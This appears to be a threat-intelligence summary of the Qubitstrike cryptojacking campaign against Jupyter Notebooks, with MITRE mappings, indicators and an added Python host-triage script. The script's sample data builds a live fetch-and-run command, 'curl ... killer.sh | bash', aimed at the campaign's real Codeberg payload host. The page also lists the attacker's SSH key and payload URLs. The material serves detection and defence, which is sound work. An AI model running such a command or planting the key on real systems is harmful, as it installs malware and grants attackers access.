Qubitstrike is a cryptojacking campaign that targets exposed Jupyter Notebooks. It hosts its payloads on Codeberg, runs a Discord bot as its C2 channel, and harvests cloud credentials for later use. The operators deploy the XMRig miner, the Diamorphine rootkit and a Discord-based control plane, and exfiltrate credentials via the Telegram Bot API; defense evasion includes renaming binaries and deleting logs, and the malware spreads to further hosts over SSH, widening its footprint. Hashtags: #Qubitstrike #JupyterNotebooks #Codeberg #Discord #XMRig #Diamorphine #AWS #GoogleCloud
Keypoints
- Qubitstrike targets exposed Jupyter Notebooks and cloud service credential files (AWS, Google Cloud).
- The campaign uses Discord as a C2 and Telegram Bot API for credential exfiltration.
- Initial access was observed on a Jupyter honeypot: the attacker opened a Bash shell through Jupyter's terminal feature, and the command activity looked hands-on rather than fully scripted.
- mi.sh orchestrates mining and persistence, including cron-based persistence and an attacker-controlled SSH key.
- Diamorphine rootkit is deployed (kernel module or LD_PRELOAD) to hide attacker processes.
- Credential harvesting and exfiltration are automated, with found credentials sent to a Telegram bot channel.
MITRE Techniques
- [T1059.004] Unix Shell – The attacker first opened a Bash session on the Jupyter honeypot, which is where the command and scripting activity begins. "[The attacker] opened a Bash instance using Jupyter's terminal feature."
- [T1105] Ingress Tool Transfer – The main script is downloaded and executed with curl from a Codeberg repository; the curl command itself is base64-encoded to obscure it. "This downloads and executes the main script used by the attacker. The purpose of base64 encoding the curl command is likely to hide the true purpose of the script from detection."
- [T1021.004] SSH – The malware propagates to related hosts over SSH, giving it worm-like spread. "Propagating the malware to related hosts via SSH."
- [T1053.005] Cron – It registers persistent cron jobs (apache2, apache2.2, netns, netns2) that re-launch the miner and payloads on reboot or daily. "Registering cron persistence and inserting an attacker-controlled SSH key."
- [T1014] Rootkit – The Diamorphine rootkit is retrieved and installed to hide attacker processes, as a kernel module with an LD_PRELOAD fallback. "Retrieving and installing the Diamorphine rootkit."
- [T1070] Indicator Removal – Anti-forensics measures delete various Linux log files to cover tracks. "log_f() performs some antiforensics measures by deleting various Linux log files."
- [T1071.001] Web Protocols – A Discord bot serves as the command-and-control channel. "Discord C2 … uses a Discord bot as a C2."
- [T1552.001] Credentials In Files – The campaign hunts for cloud provider credential files and exfiltrates them via Telegram. "Hunts for a number of hardcoded credential files for popular cloud services … exfiltrates these via the Telegram Bot API."
Indicators of Compromise
- [File Hashes] – Hashes for mi.sh, kdfs.py, xm64.tar.gz and three further files (e.g., 9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd; bd23597dbef85ba141da3a7f241c2187aa98420cc8b47a7d51a921058323d327; 96de9c6bcb75e58a087843f74c04af4489f25d7a9ce24f5ec15634ecc5a68cd7).
- [Path] – /usr/share/.LQvKibDTq4, /tmp/.LQvKibDTq4, and 2 more paths (e.g., /usr/local/lib/libnetresolv.so; /bin/zget).
- [URL] – https://codeberg.org/m4rt1/sh/raw/branch/main/xm64.tar.gz, https://codeberg.org/m4rt1/sh/raw/branch/main/killer.sh, and 1 more (https://codeberg.org/m4rt1/sh/raw/branch/main/kill_loop.sh).
- [Wallet] – Crypto wallet ID: 49qQh9VMzdJTP1XA2yPDSx1QbYkDFupydE5AJAA3jQKTh3xUYVyutg28k2PtZGx8z3P2SS7VWKMQUb9Q4WjZ3jdmHPjoJRo.
- [SSH Key] – ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDV+S/3d5qwXg1yvfOm3ZTHqyE2F0zfQv1g12Wb7H4N5EnP1m8WvBOQKJ2htWqcDg2dpweE7htcRsHDxlkv2u+MC0g1b8Z/HawzqY2Z5FH4LtnlYq1QZcYbYIPzWCxifNbHPQGexpT0v/e6z27NiJa6XfE0DMpuX7lY9CVUrBWylcINYnbGhgSDtHnvSspSi4Qu7YuTnee3piyIZhN9m+tDgtz+zgHNVx1j0QpiHibhvfrZQB+tgXWTHqUazwYKR9td68twJ/K1bSY+XoI5F0hzEPTJWoCl3L+CKqA7gC3F9eDs5Kb11RgvGqieSEiWb2z2UHtW9KnTKTRNMdUNA619/5/HAsAcsxynJKYO7V/ifZ+ONFUMtm5oy1UH+49ha//UPWUA6T6vaeApzyAZKuMEmFGcNR3GZ6e8rDL0/miNTk6eq3JiQFR/hbHpn8h5Zq9NOtCoUU7lOvTGAzXBlfD5LIlzBnMA3EpigTvLeuHWQTqNPEhjYNy/YoPTgBAaUJE= root@kali
- [Mining pool] – pool.hashvault.pro:80 (host:port, not a URL)
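The techniques and indicators above translate directly into host-triage checks. The script below is an added example, not code from Cado Security or from the campaign: it decodes base64-wrapped download commands found in shell history (the T1105 step), and matches the cron job names, the attacker's SSH key, the file paths and the wallet/pool string from the indicator list. The host snapshot it runs against is constructed here, and the base64 blob in it is built from a curl command to the killer.sh URL listed above rather than copied from a real incident.

```python
"""Host-triage checks for the Qubitstrike artefacts listed on this page.

Added example, not code from Cado Security or from the campaign itself. It
runs against a constructed snapshot of a host (shell history, /etc/cron.d
names, authorized_keys, file paths, miner config) so it works offline.
"""
import base64
import re
from typing import Dict, List, Tuple

# Indicators copied from the IOC list above.
CRON_JOB_NAMES = {"apache2", "apache2.2", "netns", "netns2"}
IOC_PATHS = {
    "/usr/share/.LQvKibDTq4",
    "/tmp/.LQvKibDTq4",
    "/usr/local/lib/libnetresolv.so",
    "/bin/zget",
}
WALLET = "49qQh9VMzdJTP1XA2yPDSx1QbYkDFupydE5AJAA3jQKTh3xUYVyutg28k2PtZGx8z3P2SS7VWKMQUb9Q4WjZ3jdmHPjoJRo"
POOL = "pool.hashvault.pro:80"
PAYLOAD_HOST = "codeberg.org/m4rt1/sh/"
# The attacker-controlled public key (base64 body only, split for line length).
ATTACKER_KEY_BLOB = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABgQDV+S/3d5qwXg1yvfOm3ZTHqyE2F0zfQv1g12Wb7H4N5EnP1m8WvBOQKJ2htWqcDg2dpweE7htcRsHDxlkv2u+MC0g1b8Z"
    "/HawzqY2Z5FH4LtnlYq1QZcYbYIPzWCxifNbHPQGexpT0v/e6z27NiJa6XfE0DMpuX7lY9CVUrBWylcINYnbGhgSDtHnvSspSi4Qu7YuTnee3piyIZhN9m+tDgtz"
    "+zgHNVx1j0QpiHibhvfrZQB+tgXWTHqUazwYKR9td68twJ/K1bSY+XoI5F0hzEPTJWoCl3L+CKqA7gC3F9eDs5Kb11RgvGqieSEiWb2z2UHtW9KnTKTRNMdUNA619"
    "/5/HAsAcsxynJKYO7V/ifZ+ONFUMtm5oy1UH+49ha//UPWUA6T6vaeApzyAZKuMEmFGcNR3GZ6e8rDL0/miNTk6eq3JiQFR/hbHpn8h5Zq9NOtCoUU7lOvTGAzXBlfD5LIlzBnMA3EpigTvLeuHWQTqNPEhjYNy/YoPTgBAaUJE="
)

# `echo <base64> | base64 -d` as used in the initial-access step; the blob must be
# at least 24 chars so short, ordinary uses of base64 do not match.
B64_PIPE_RE = re.compile(
    r"""echo\s+["']?([A-Za-z0-9+/=]{24,})["']?\s*\|\s*base64\s+(?:-d|--decode)\b"""
)

Finding = Tuple[str, str]  # (MITRE technique or IOC class, detail)


def decode_base64_commands(history: List[str]) -> List[Tuple[str, str]]:
    """Return (raw_line, decoded_text) for every base64-wrapped shell pipe in history."""
    out: List[Tuple[str, str]] = []
    for line in history:
        m = B64_PIPE_RE.search(line)
        if not m:
            continue
        try:  # binascii.Error (bad padding etc.) is a subclass of ValueError
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            continue
        out.append((line, decoded))
    return out


def triage(host: Dict) -> List[Finding]:
    """Run every indicator check against a host snapshot and return the findings."""
    findings: List[Finding] = []

    for _raw, decoded in decode_base64_commands(host.get("history", [])):
        if re.search(r"\b(curl|wget)\b", decoded):
            detail = "base64-wrapped download: " + decoded.strip()
            if PAYLOAD_HOST in decoded:
                detail += " (Codeberg payload host from the IOC list)"
            findings.append(("T1105", detail))

    cron_hits = CRON_JOB_NAMES & set(host.get("cron_d", []))
    if cron_hits:
        findings.append(("T1053.005", f"cron jobs named {sorted(cron_hits)}"))

    if ATTACKER_KEY_BLOB in host.get("authorized_keys", ""):
        findings.append(("T1021.004", "attacker-controlled key present in authorized_keys"))

    path_hits = IOC_PATHS & set(host.get("paths", []))
    if path_hits:
        findings.append(("IOC-path", f"known payload/rootkit paths present: {sorted(path_hits)}"))

    config = host.get("miner_config", "")
    if WALLET in config or POOL in config:
        # T1496 (Resource Hijacking) is the usual mapping for XMRig; it is not in the list above.
        findings.append(("T1496", "miner config references the Qubitstrike wallet or pool"))

    return findings


# Constructed sample host, modelled on the behaviour described above. The download
# command is assembled here, so its base64 blob is not a real observed one.
_CURL = "curl -s -L https://codeberg.org/m4rt1/sh/raw/branch/main/killer.sh | bash"
_B64 = base64.b64encode(_CURL.encode()).decode()
SAMPLE_HOST = {
    "history": ["ls -la", f"echo {_B64} | base64 -d | bash", "echo aGVsbG8= | base64 -d"],
    "cron_d": ["e2scrub_all", "netns", "apache2.2"],
    "authorized_keys": "ssh-rsa " + ATTACKER_KEY_BLOB + " root@kali\n",
    "paths": ["/usr/local/lib/libnetresolv.so", "/etc/hostname"],
    "miner_config": '{"url": "pool.hashvault.pro:80", "user": "' + WALLET + '"}',
}

if __name__ == "__main__":
    for technique, detail in triage(SAMPLE_HOST):
        print(f"[{technique}] {detail}")
```

On a real host the snapshot would be filled from ~/.bash_history (note that the campaign deletes logs, so history may already be gone), the file names in /etc/cron.d, every user's authorized_keys, and any config.json next to a renamed miner binary; the SSH key match is the most durable of these, since it survives a reboot and log wiping.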
Read more: https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/